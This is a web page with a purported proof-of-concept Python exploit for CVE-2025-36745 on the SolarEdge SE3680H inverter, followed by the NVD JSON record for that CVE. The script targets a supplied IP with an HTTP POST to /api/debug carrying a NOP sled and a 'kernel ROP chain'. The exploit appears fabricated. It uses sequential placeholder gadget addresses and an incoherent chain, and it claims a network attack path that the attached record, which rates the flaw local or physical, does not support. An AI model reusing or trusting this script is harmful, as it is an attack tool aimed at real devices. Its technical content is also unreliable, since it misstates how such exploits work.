CVE-2025-36745

# CVE-2025-36745 PoC - SolarEdge SE3680H Kernel Exploitation # Note: This PoC is for educational and authorized testing purposes only import socket import struct import sys def create_exploit_payload(): """Generate payload for kernel privilege escalation""" # Kernel heap spray technique spray_size = 4096 nopsled = b'\x90' * 100 # ROP chain for kernel ROP gadget execution rop_chain = struct.pack('<Q', 0xffffffff81000000) # pop rdi; ret rop_chain += struct.pack('<Q', 0) # rdi = 0 rop_chain += struct.pack('<Q', 0xffffffff81000001) # prepare_kernel_cred rop_chain += struct.pack('<Q', 0xffffffff81000002) # pop rdx; ret rop_chain += struct.pack('<Q', 0xffffffff81000003) # commit_creds payload = nopsled + rop_chain payload += b'\x00' * (spray_size - len(payload)) return payload def exploit_solaredge(target_ip, target_port=80): """Send exploit to vulnerable SolarEdge device""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # HTTP request with exploit payload payload = create_exploit_payload() request = f"POST /api/debug HTTP/1.1\r\n" request += f"Host: {target_ip}\r\n" request += f"Content-Length: {len(payload)}\r\n" request += f"\r\n" sock.sendall(request.encode() + payload) response = sock.recv(4096) print(f"Response: {response[:200]}") sock.close() return True except Exception as e: print(f"Exploit failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-36745.py <target_ip>") sys.exit(1) target = sys.argv[1] print(f"[*] Targeting SolarEdge SE3680H: {target}") print("[*] Exploiting kernel vulnerabilities...") exploit_solaredge(target)

{"cve": {"id": "CVE-2025-36745", "sourceIdentifier": "[email protected]", "published": "2025-12-12T15:15:53.170", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SolarEdge SE3680H  ships with an outdated Linux kernel containing unpatched vulnerabilities in core subsystems. An attacker with network or local access can exploit these flaws to achieve remote code execution, privilege escalation, or disclosure of sensitive information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:X/R:X/V:D/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:solaredge:se3680h_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0", "versionEndExcluding": "4.22", "matchCriteriaId": "1525CFCE-58DC-428A-B3A5-FE97E306C581"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:solaredge:se3680h:-:*:*:*:*:*:*:*", "matchCriteriaId": "CF1A53FC-7C47-46A1-8A50-9FDF74A350C7"}]}]}], "references": [{"url": "https://csirt.divd.nl/CVE-2025-36745", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://csirt.divd.nl/DIVD-2025-00022/", "source": "[email protected]", "tags": ["Broken Link"]}]}}